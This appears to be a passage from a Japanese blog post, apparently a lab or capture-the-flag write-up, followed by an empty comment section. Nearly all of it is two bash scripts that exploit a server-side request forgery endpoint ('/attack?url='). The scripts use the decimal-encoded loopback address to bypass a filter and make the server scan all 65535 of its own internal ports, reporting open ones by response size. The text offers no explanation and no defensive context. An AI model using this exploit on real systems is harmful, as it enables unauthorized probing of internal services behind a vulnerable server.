#!/bin/bash
for x in {1..65535};
do cmd=$(curl -so /dev/null http://MACHINE_IP:8000/attack?url=http://2130706433:${x} \
-w '%{size_download}');
if [ $cmd != 1045 ]; then
echo "Open port: $x"
fi
done
#!/bin/bash
for x in $(seq 1 65535)
do cmd=$(curl -so /dev/null http://10.10.177.105:8000/attack?url=http://2130706433:${x} -w '%{size_download}');
if [ $cmd != 1045 ]; then
echo "Open port: $x"
fi
done
ディスカッション
コメント一覧
まだ、コメントがありません